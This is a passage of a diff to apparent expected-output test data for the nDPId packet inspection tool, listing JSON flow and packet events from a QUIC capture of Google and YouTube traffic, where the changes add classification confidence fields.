FRgiwKsTBAmWpaZkpoPFgLFa3EJsGBMBmnjReIBJbmA3LISQyS2EZgNND03taQIqApZNdAoYNslIxNcQDUJgHg5aDFfmV9aUpqUqpuXn5yfn50JT0xQcTRlqSmlkCoclkCAqSU3HcyRgie\/nMzUvJJiZHu4kZMmC0h9ExtQGtjGaRLBmvS4kJMslmDjQvIWF7hohpjGAXanXhIwupE9IILN+UgNKvYGgwykYjkGWLBoIxW48tAysCA7E8lX+u6eju5G4BJVG6kMhymGBoMhsg5QuY7UyNu9zVfBNmHfgtcntnZxTm9nnlVuroPW0EEuq7H2jBQhLQdg1YXWHeFgY0tv5AEW0wYGkKaOpoG6geoC5QWKhPyTg60rM437WMnVr0Fh6yZfC2hnKAg7V\/sxee8PtZO5FbZ1acp71Q6HKqZyNBhq7p\/nsXAW25P1rcHTNaa7r+Awva26447s1IeZ21l\/6b3PLeZ8oqL348JrZiOFCVzymU7uQRff2XMtf7nLtfn49Zsv9UIiy48GunguNJ8u19fsmjHl7+vgJzfPh7HMtG92lojP+H9uKYtC2fVFHPef18x48qbQ8HPxpewsRZ2PmUWTl2TPWuDrq\/9ubtJn"}
 02233{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":444,"source":"quic.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1463060980446,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1463060980446,"pkt":"eJKcD6iO8IQvSpdgCABFAAVi7JsAADERM7XYOsnuwKgBaQG72n4FTodMDNvEpLUMteNnAjCUFcdtv6XHZbkQxgCkAS0FXQCLsNsKswVSG3lP+qzvmF246uDhGtUyFwaTzRJRxS8XOFxmLluatV\/uy7O6p0+N2bQ\/+Zrt1fpZeW6648bpNyd9YDE3eJJ8v\/9lvMKhkrynd\/W+TFqduscYADp6WRYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
 02247{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":449,"source":"quic.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1463060980460,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1463060980460,"pkt":"eJKcD6iO8IQvSpdgCABFAAVifaoAADIRmLPYOtLhwKgBaQG70jkFThU9AAFbOkhXLI3U967KCL3cJUfMqLc5FSrY4cYs3xypa7qHkPMQkfyihNqC28UhBOL3e\/5TBI7YTG0J23OmdlC7GgmCbVWFBre3mnIHOH5gNl6B4pV+JLE9LheDJBWLfps\/P5l5aMhy6p4xkqOtVn+84yrn69vnIGngY2UUctisj\/\/7qbGHoU7KjFVZvLiLnesCjZPEQ9bmtTdxJ8NIoohV99NBrL3ZR\/mRKqFg6ck1jjGMancWDX9uCodwuw+nFeiwhdNiUXqpCyb8WsgjNJlQgx5Jzfa6dxFwnJS2EsJzy1jow479DEUJQyupcHux9LBb4IxdT8f537ef70Ew4CvWu3Iba3a+sRfT8oSLt0CF8xrbGmeBEnSqbecBn6F2MYjUF2gtYKqmlv2GpssQgCf+y1IgiyKvJBAFYATvIM5Yoz\/5ASrdVp19my0ed8fkjXD\/9hI6BqGDwauf0bTx1RLAMhLrvl6pXAmkTiy9XjRAKtxJq+C1D4UKHSSI2+YjymrUAqCH3KRAZmA0Bxs3bF5O\/PSuozCEiM1fA6uKcRzdnnQiYy07+fjPtlVxQByhag2n\/cAPz+kuIj8MMSN1yDveDuOdF8jXFe5s9mrKD8JMfRZctDC3tl6y0RDe95cUiGF72q+hrAL\/PnaEp3C0gWLN0HrD0R9JOOxmp7Auh7povQU79kvL0xqyh4jnZ\/Eauv5xfJJ9WERDrqx3CTTuciqZlam2PDCCuo1MW4zttYvjA3nx3zF4aGwysEzvVFN3YL6hVQjdDA4G9W2+Ef0aVvJ6dwImjNYp4R0XlWhoyOCtNc6n9KHJ2lGiAOWbtoy+eIkUgerfolxpj29D8pTuvRSA6xSdgniEhkWz2S88FBK7lsS9dfKhGidfIxn3mpcstFKBaupKzVmBUCAqw1Z9aWdecUTnIY67owXaqxfverdyb0S4+uAKmDm4p8KZN+VbJFG\/ylg0sBWP80mInpEbGS7MrNOzG+nWmwobpNpDfkH6k4MJahEdbTJwc8F0zwrc9OBje09p8uO+iXNyZJSmFPRBYsNZ4SG8aHlZEWwk1zN++dYeWoX+nUUYJD4SmFHSyUSfF3Ib+mhP8VYivL+Z49LFaGNAB7KGxHv6fvGdSutX9bFiP1ZkAEhpweNPt8+O3nQTWj927mHvqPFEoMfTdYknC6NXf1NUkjL0SCHGhtXTgom7sP8gds1oLZBN2H5EejX\/eUCiWr6Vz0O2ty3vLiEaKe45R6dpcVbZGDcZnogU1oKhCd5eIW5VCS9ZoxdQUXYVQ5OVZmD0+lXGLDhaxED1Sg0QBEID7Gyk3XlpIelSpdCcj7XZyy+fDz5peeAIHd7A\/NT1xszFkW3dJpaVelwRfVQ2Tajy6IY3aeRniays5OlSdDEGtZvz+UGoOACWTNtx+Bck5uH4c3U2F4B+CPTc7F0hvJL623HEU79LiEo5zzmsjK4jgrRtPE6Ujm4ZpuNfqh8tPnhC9+Bi2Aja+3eezVsTpRflcLiQs0+wiUrXwIMtQYHLDjHEkGkWCaZ1nNn1+gwpcra6WAb6OHVPMNzrYJK0SrAHU0\/USbaXPZLFNMj2alWPs47VfDow3\/W3uXsLSYKoanH+Y+vNHJPIWjV0xMRUN6pTJE7IVb0BTnZ7b0D3Y4\/SxaKloeNxIuesxRvodNcMI\/1buC5kqkJStpYaf7KVkJyh1GHdI8GrmxoF2MSLqGY6lT0vPgbFD4MZreGOa5Sssczsczl+luw+iYguWV7SHDSmHfZxeBgkr589fC51KvvuWXNd3GZS5QlUqIxlrJRMHt8X"}
-00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":450,"source":"quic.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1463060980356,"flow_last_seen":1463060980457,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5477,"flow_avg_l4_payload_len":912,"midstream":0,"ts_msec":1463075953299,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.201.227","src_port":40030,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}}
-00602{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":450,"source":"quic.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463060980313,"flow_last_seen":1463060980404,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":79,"midstream":0,"ts_msec":1463075953299,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"172.217.16.3","src_port":40461,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"Google","breed":"Acceptable","category":"Web"}}
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":450,"source":"quic.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1463060980356,"flow_last_seen":1463060980457,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5477,"flow_avg_l4_payload_len":912,"midstream":0,"ts_msec":1463075953299,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.201.227","src_port":40030,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}}
+00636{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":450,"source":"quic.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463060980313,"flow_last_seen":1463060980404,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":79,"midstream":0,"ts_msec":1463075953299,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"172.217.16.3","src_port":40461,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Google","breed":"Acceptable","category":"Web"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":450,"source":"quic.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463060980313,"flow_last_seen":1463060980404,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":79,"midstream":0,"ts_msec":1463075953299,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"172.217.16.3","src_port":40461,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00648{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":450,"source":"quic.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1463060980349,"flow_last_seen":1463060980446,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2737,"flow_avg_l4_payload_len":912,"midstream":0,"ts_msec":1463075953299,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.214.110","src_port":48445,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}}
-00648{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":450,"source":"quic.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1463060980336,"flow_last_seen":1463060980436,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":6251,"flow_avg_l4_payload_len":893,"midstream":0,"ts_msec":1463075953299,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.238","src_port":34438,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}}
-00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":450,"source":"quic.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1463060980301,"flow_last_seen":1463060980460,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":4124,"flow_avg_l4_payload_len":824,"midstream":0,"ts_msec":1463075953299,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"172.217.16.4","src_port":45669,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":450,"source":"quic.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463060980378,"flow_last_seen":1463060980460,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2700,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1463075953299,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.225","src_port":53817,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":450,"source":"quic.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1463060980364,"flow_last_seen":1463060980449,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1463075953299,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.201.238","src_port":55934,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}}
+00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":450,"source":"quic.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1463060980349,"flow_last_seen":1463060980446,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2737,"flow_avg_l4_payload_len":912,"midstream":0,"ts_msec":1463075953299,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.214.110","src_port":48445,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}}
+00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":450,"source":"quic.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1463060980336,"flow_last_seen":1463060980436,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":6251,"flow_avg_l4_payload_len":893,"midstream":0,"ts_msec":1463075953299,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.238","src_port":34438,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}}
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":450,"source":"quic.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1463060980301,"flow_last_seen":1463060980460,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":4124,"flow_avg_l4_payload_len":824,"midstream":0,"ts_msec":1463075953299,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"172.217.16.4","src_port":45669,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":450,"source":"quic.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463060980378,"flow_last_seen":1463060980460,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2700,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1463075953299,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.225","src_port":53817,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":450,"source":"quic.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1463060980364,"flow_last_seen":1463060980449,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1463075953299,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.201.238","src_port":55934,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":450,"source":"quic.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463075953299,"flow_last_seen":1463075953299,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1463075953299,"l3_proto":"ip4","src_ip":"192.168.1.109","dst_ip":"216.58.210.206","src_port":35236,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02234{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":450,"source":"quic.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1463075953299,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1463075953299,"pkt":"6HTmLPTkABlmWmaMCABFAAViaTtAAEARXzHAqAFt2DrSzomkAbsFTpsFDby767UFbXetUTAzMAEh5i93uTUS22zwlS0AoAEABENITE8aAAAAUEFEAEYBAABTTkkAVQEAAFNUSwCPAQAAVkVSAJMBAABDQ1MAowEAAE5PTkPDAQAATVNQQ8cBAABBRUFEywEAAFVBSUTsAQAAU0NJRPwBAABUQ0lEAAIAAFBETUQEAgAAU1JCRggCAABJQ1NMDAIAAE5PTlAsAgAAUFVCU0wCAABTQ0xTUAIAAEtFWFNUAgAAWExDVFwCAABDU0NUXAIAAENPUFRgAgAAQ0NSVHgCAABJUlRUfAIAAENFVFYgAwAAQ0ZDVyQDAABTRkNXKAMAAC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0td3d3LnlvdXR1YmUuY29teFwziXjGfp0+iLiPa5NFRFyqDFkuaiall82sYIzujJV2eEmSxVGrXgdwnEo24jy3PXEgwhIODsHz2lEwMzB7Junn5Fxx\/wHogWCSkhroVzTEcXji0toaKKW2C\/sjLL4Hx\/uc6Fh9FqIQ4mtE7XBkAAAAQ0MyMENocm9tZS81MC4wLjI2NjEuMTAyIExpbnV4IHg4Nl82NO4xNazIxw51CPh92NozyjEAAAAAWDUwOQAAEAAeAAAAV2LXIh+dp84WNbuB7eLfYt7CEN3uuVCwsaMPVZLZkwAcWv3ewLeWKh8oWp+ADGqv7hr4e6BITFL34pf63u8lTgEAAABDMjU1Ve9eTSHF9WVGSVhEVe9eTSHF9WXiYxqCfXGFX0ALe5CprnnrQX4AAJnDlbsORKBU4xOKlwWO9P4E5XFal5z7hzqpwhe\/gMX+Blclu+PZJjQ25zzFRxooIRN4BrBfLQmDdxaJYtqVNyhOzgBZdHzyh0tqgzeC9Fkja7K8HfjiuAyeK8FHD1egJgrMDFGpXlhTM816keOEywC8bzRfESJQUt0PZFKBRrh3m2XPL+hfh5e34YbH0wkaQLc6HM0z36TboZSwOAF93TLAofZgAADwAAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00722{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":450,"source":"quic.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463075953299,"flow_last_seen":1463075953299,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1463075953299,"l3_proto":"ip4","src_ip":"192.168.1.109","dst_ip":"216.58.210.206","src_port":35236,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"www.youtube.com","user_agent":"Chrome\/50.0.2661.102 Linux x86_64"}}
+00748{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":450,"source":"quic.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463075953299,"flow_last_seen":1463075953299,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1463075953299,"l3_proto":"ip4","src_ip":"192.168.1.109","dst_ip":"216.58.210.206","src_port":35236,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"www.youtube.com","user_agent":"Chrome\/50.0.2661.102 Linux x86_64"}}
 00894{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":451,"source":"quic.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1463075953300,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":387,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":387,"pkt_l4_len":353,"ts_msec":1463075953300,"pkt":"6HTmLPTkABlmWmaMCABFAAF1aTxAAEARYx3AqAFt2DrSzomkAbsBYbFkDby767UFbXetUTAzMAIyT2zFCwKRbjpW5pKGcwa\/zOYtI4ibM\/DXTo+3hM8QHjQop2VE57N\/4px1Dr2rh1Of6fuprsXKXOLDTQHDMOztLE0ibzNUs5cviwMINA8HUKs1w\/8wSCAJg+c5E0s64vzHKdQ5N4AY1I+whZj+YXv7QX9bQtyBCP0WJRsK41puLJyY\/5rYf1WXDzsnCxRRei33WDvMsb+MNKppe2kXK4Q1DqzsKviobjh+ZnTmMaJFKxfjljXwNv0dsW2Nhjh9NEpVNdRUHHe+L\/umz5nJPSc8m3xsZrs27PfAfYs3O4DQT7zrN+rUD1tvAlM6ojpuYBXQUKIqFg6jkPkLtz0lnT5ofUC3bxq1J8gFqtExK3aj\/kH0as9Y1tYZiRMdgBmqLNq1Ru6unJsdETbKAQha1+Pgo4qtxiVVhohC7TEjAQj3UwwRrwKowX6bUvpY"}
 02244{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":452,"source":"quic.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1463075953334,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1463075953334,"pkt":"ABlmWmaM6HTmLPTkCABFAAViGxkAADQR+VPYOtLOwKgBbQG7iaQFTgWwDLy767UFbXetARhGCjp5JYP2NRSCDQGAAVJFSgAHAAAAU1RLADwAAABTTk8AdAAAAFBST0a7AAAAU0NGR04BAABSUkVKUgEAAENTQ1RGAgAAQ1JU\/xIGAAAt19AYB5aaMKurHRM81LpDG06F1\/HgjIAXnLSYHoaRDG+YCx4gYrs3k43pE\/W5utsyegd0CLIV4fasqoZkRpVLMtnpS+sIRqrbfvgjIL2IUeZTlSGu\/7+bU4Z+Ij1vgEEcToZ\/00OYAYgC+05liNl+ov97hTBFAiBs6kS1HuLjC8x7gQEfBCOAowmjvDZU885lgtcWaGEy0QIhAPm+1mJq5QK6WHRPaEUwOfyND\/8ufeGnt66391Aj9lqnU0NGRwcAAABBRUFECAAAAFNDSUQYAAAAUERNRBwAAABQVUJTPwAAAEtFWFNDAAAAT0JJVEsAAABFWFBZUwAAAEFFU0dDQzIwWGClOjtYNIHfmiHJ0bGFX0NISUQgAACup8alaVf8gP6KOzle5pjmXvoOKgb+N2LRgB5dcX8Ka0MyNTUSxc3dEjis6kATN1cAAAAADQAAAADyAHcA7ku9t3XOYLrhQmkfq+GeZqMPfl+wctiDAMR7iXqo\/csAAAFUe1HMJwAABAMASDBGAiEAqHfzHEY9KN1QjXeaiZlcHt6ybhyDsnLIoo6e82Zg73ACIQCveMl0OwuTrVY5LqDcb5TIihLD6ZAJQlUDU68E5\/BK6AB3AN3rHSt6DU+mIIuBrYFocH4ujp0B1VyIjT0RxM227L7MAAABVHtRyfMAAAQDAEgwRgIhAMWc6riI2T4lmoQuPyvTrFTQuoCnh6VaWJBNwHgCZloKAiEAiHJhhSnJcrUXaDEZQLClSBLKToA3CEOVFu+IPvrOhh4BAwHogWCSkhroAwAAAAN7Junn5Fxx\/wAAAAAA\/wYAAHi7c1AtxPvNxgAsudi+GzSx3oe04Tic2NatWf922kf0hhwVG1mgwsAMmIdMgPkF1p4zMDcyN7AwtgR1otKwWsXBw+UMTDdp+UV5mYmwBMnOw+ubX5pXAkpdYZmp5XB38SC7S9RAGOwuHh4tYJiChMGRGwkUZgf68ZwtsPnBAWYwM7IzO